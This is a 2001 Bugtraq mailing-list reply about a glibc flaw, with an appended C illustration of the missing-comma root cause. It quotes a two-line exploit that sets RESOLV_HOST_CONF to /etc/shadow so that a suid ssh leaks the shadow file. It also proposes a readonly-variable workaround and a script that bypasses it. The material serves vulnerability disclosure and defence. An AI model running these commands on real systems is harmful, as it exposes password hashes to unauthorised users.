Bugtraq mailing list archives
Re: Glibc Local Root Exploit
From: Digital Overdrive <digiover () dsinet org>
Date: Wed, 10 Jan 2001 23:43:31 +0100
Charles Stevenson wrote:
> Hi all,
>
> This has been bouncing around on vuln-dev and the debian-devel lists. It affects glibc >= 2.1.9x and it would seem many if not all OSes using these versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and the actual fix was a missing comma in the list of secure env vars that were supposed to be cleared when a program starts up suid/sgid (including RESOLV_HOST_CONF)."
>
> The exploit varies from system to system but in our devel version of Yellow Dog Linux I was able to print the /etc/shadow file as a normal user in the following manner:
>
>     export RESOLV_HOST_CONF=/etc/shadow
>     ssh whatever.host.com

huge typo in my previous post... services has to be profiles ;-)

----
[Credits to ^herman^ in #hit2000 on ircnet]

A temp. solution is to place this in /etc/profiles:

    declare -r RESOLV_HOST_CONF

    jan@flits102-93:~$ export RESOLV_HOST_CONF=/etc/shadow
    bash: RESOLV_HOST_CONF: readonly variable
    jan@flits102-93:~$
----

But even here is a workaround for :

Make a script (e.g. blaat)

    #!/bin/sh
    export RESOLV_HOST_CONF=/etc/shadow
    ssh whatever.host.com

    ~$ sh --noprofile blaat

[again credits to ^herman^]

Regards,

Jan (Digital Overdrive)

--
  .~.    http://www.dsinet.org  | http://www.dsinet.org/hackfaq
  /V\    digiover () dsinet org | digiover () cotse com
 /( )\
 ^^-^^
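
The root cause Ben Collins is quoted as describing, a missing comma in the list of variables to clear, shown as an added C example that is not part of the original post and is not glibc's source. The two lists and the helper names `scrub` and `survives` are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200112L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed list (not glibc's own). The comma after "LOCALDOMAIN" is
 * missing, so the compiler joins the two adjacent literals into the single
 * entry "LOCALDOMAINRESOLV_HOST_CONF" and neither real name is listed.
 * clang reports this pattern under -Wstring-concatenation. */
static const char *const buggy_list[] = {
    "LD_PRELOAD",
    "LOCALDOMAIN"
    "RESOLV_HOST_CONF",
    "HOSTALIASES",
};

/* Same list with the comma restored. */
static const char *const fixed_list[] = {
    "LD_PRELOAD",
    "LOCALDOMAIN",
    "RESOLV_HOST_CONF",
    "HOSTALIASES",
};

#define COUNT(a) (sizeof(a) / sizeof((a)[0]))

/* Unset every listed variable, as startup code for a suid/sgid program would. */
static void scrub(const char *const *list, size_t n)
{
    for (size_t i = 0; i < n; i++)
        unsetenv(list[i]);
}

/* Set `name` to a constructed value, scrub with `list`, report if it is still set. */
static int survives(const char *const *list, size_t n, const char *name)
{
    setenv(name, "/constructed/path", 1);
    scrub(list, n);
    return getenv(name) != NULL;
}

int main(void)
{
    printf("entries: buggy=%zu fixed=%zu\n", COUNT(buggy_list), COUNT(fixed_list));
    printf("RESOLV_HOST_CONF survives buggy list: %d\n",
           survives(buggy_list, COUNT(buggy_list), "RESOLV_HOST_CONF"));
    printf("RESOLV_HOST_CONF survives fixed list: %d\n",
           survives(fixed_list, COUNT(fixed_list), "RESOLV_HOST_CONF"));
    return 0;
}
```

Comparing the array's element count against the number of names it is meant to hold is a cheap regression check for this class of bug.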